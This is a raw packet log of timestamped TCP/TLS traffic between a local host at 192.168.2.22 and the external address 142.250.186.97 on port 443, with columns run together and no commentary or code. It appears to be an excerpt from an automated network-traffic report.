                                          Oct 24, 2024 08:59:15.269045115 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.286237001 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.286384106 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.286415100 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.286432028 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.286494017 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.286506891 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.306008101 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.306108952 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.306124926 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.306179047 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.306221962 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.306243896 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.306261063 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.306319952 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.306333065 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.306550980 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.306612968 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.306619883 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.306634903 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.306693077 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.306704998 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.307475090 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.307533979 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.307539940 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.307558060 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.307611942 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.342674017 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.342797041 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.342837095 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.342978954 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.342998028 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.343059063 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.344459057 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.360892057 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.360950947 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.361113071 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.361125946 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.361191034 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.361228943 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.361255884 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.361294031 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.361301899 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.361321926 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.361381054 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.362031937 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.363431931 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.363488913 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.363488913 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.363503933 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.363554955 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.363569021 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.363876104 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.363929987 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.363944054 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.364510059 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.364538908 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.364552975 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.364609003 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.364615917 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.364629030 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.364633083 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.364682913 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.364826918 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.364872932 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.367758989 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.368019104 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.368077993 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.368091106 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.368330002 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.368396044 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.368407965 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.377660990 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.377743959 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.377756119 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.377882957 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.377943039 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.377954960 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.421264887 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.421295881 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.421331882 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.421395063 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.421435118 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.421473026 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.459990978 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.460058928 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.460094929 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.460128069 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.460156918 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.478826046 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.478871107 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.478904009 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.478924036 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.478949070 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.478949070 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.482175112 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.482206106 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.482239962 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.482258081 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.482286930 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.494662046 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.494702101 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.494743109 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.494760990 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.494786024 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.538703918 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.538747072 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.538786888 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.538851023 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.538886070 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.577383041 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.577433109 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.577462912 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.577486992 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.577513933 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.595990896 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.596035004 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.596153021 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.596153021 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.596219063 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.596252918 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.596313953 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.599405050 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.599436998 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.599478006 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.599497080 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.599524975 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.611960888 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.611996889 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.612040043 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.612066031 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.612090111 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.655807018 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.655838013 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.655968904 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.655968904 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.656035900 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.694639921 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.694696903 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.694737911 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.694802999 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.694833994 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.694860935 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.694885969 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.697408915 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.712951899 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.712963104 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.713114023 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.713177919 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.713219881 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.713253975 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.717396021 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.717430115 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.717470884 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.717494011 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.717524052 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.728600979 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.728631020 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.728708029 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.728729963 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.728754997 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.728790998 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.772263050 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.772433996 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.772476912 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.772538900 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.772582054 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.775182009 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.775223017 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.775257111 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.775279045 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.775299072 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.775321007 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.775367022 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.813812971 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.813896894 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.813945055 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.814007998 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.814042091 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.833760023 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.833858967 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.833864927 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.833899975 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.833941936 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.836956024 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.837025881 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.837044001 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.837061882 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.837105036 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.855077982 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.855165958 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.855165958 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.855197906 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.855238914 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.890202999 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.890285015 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.890400887 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.890400887 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.890418053 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.928972960 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.929068089 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.929076910 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.929102898 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.929133892 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.947211027 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.947294950 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.947333097 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.947348118 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.947366953 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.947376966 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.947422981 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.951654911 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.951735973 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.951745033 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.951776028 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.951818943 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.962555885 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.962634087 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.962635040 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.962668896 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.962709904 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.989598036 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.989686012 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.989799023 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:15.989826918 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:15.989959002 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.008976936 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.009072065 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.009080887 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.009157896 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.009335041 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.046365976 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.046443939 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.046464920 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.046514034 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.046546936 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.064809084 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.064891100 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.064907074 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.064934969 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.064963102 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.064974070 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.065031052 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.069422007 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.069497108 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.069592953 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.069617033 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.069638968 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.071518898 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.071593046 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.071604013 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.071630001 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.071664095 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.089370012 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.089436054 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.089473963 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.089499950 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.089526892 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.089555979 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.126095057 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.126214027 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.126246929 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.126326084 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.163346052 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.163429976 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.163537025 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.163600922 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.163635969 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.181709051 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.181792021 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.181802034 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.181833029 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.181874990 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.185169935 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.185256004 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.185291052 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.185321093 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.185367107 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.187289000 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.187374115 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.187401056 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.187485933 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.187552929 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.187568903 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.197571039 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.197645903 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.197685957 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.197737932 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.197771072 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.241801977 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.241888046 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.241900921 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.241961956 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.241997004 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.244477034 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.244541883 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.244550943 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.244584084 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.244621992 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.281956911 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.282040119 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.282041073 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.282083988 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.282118082 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.282157898 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.306283951 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.306361914 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.306397915 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.306420088 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.306447983 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.308163881 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.308242083 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.308255911 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.308273077 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.308326006 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.313888073 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.313967943 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.313976049 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.314013004 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.314049959 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.323790073 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.323884010 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.323900938 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.323937893 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.324054956 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.324069023 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.358684063 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.358752012 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.358778954 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.358819962 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.358849049 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.362008095 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.362082958 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.362098932 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.362126112 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.362154007 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.399492025 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.399561882 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.399597883 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.399597883 CEST49167443192.168.2.22142.250.186.97
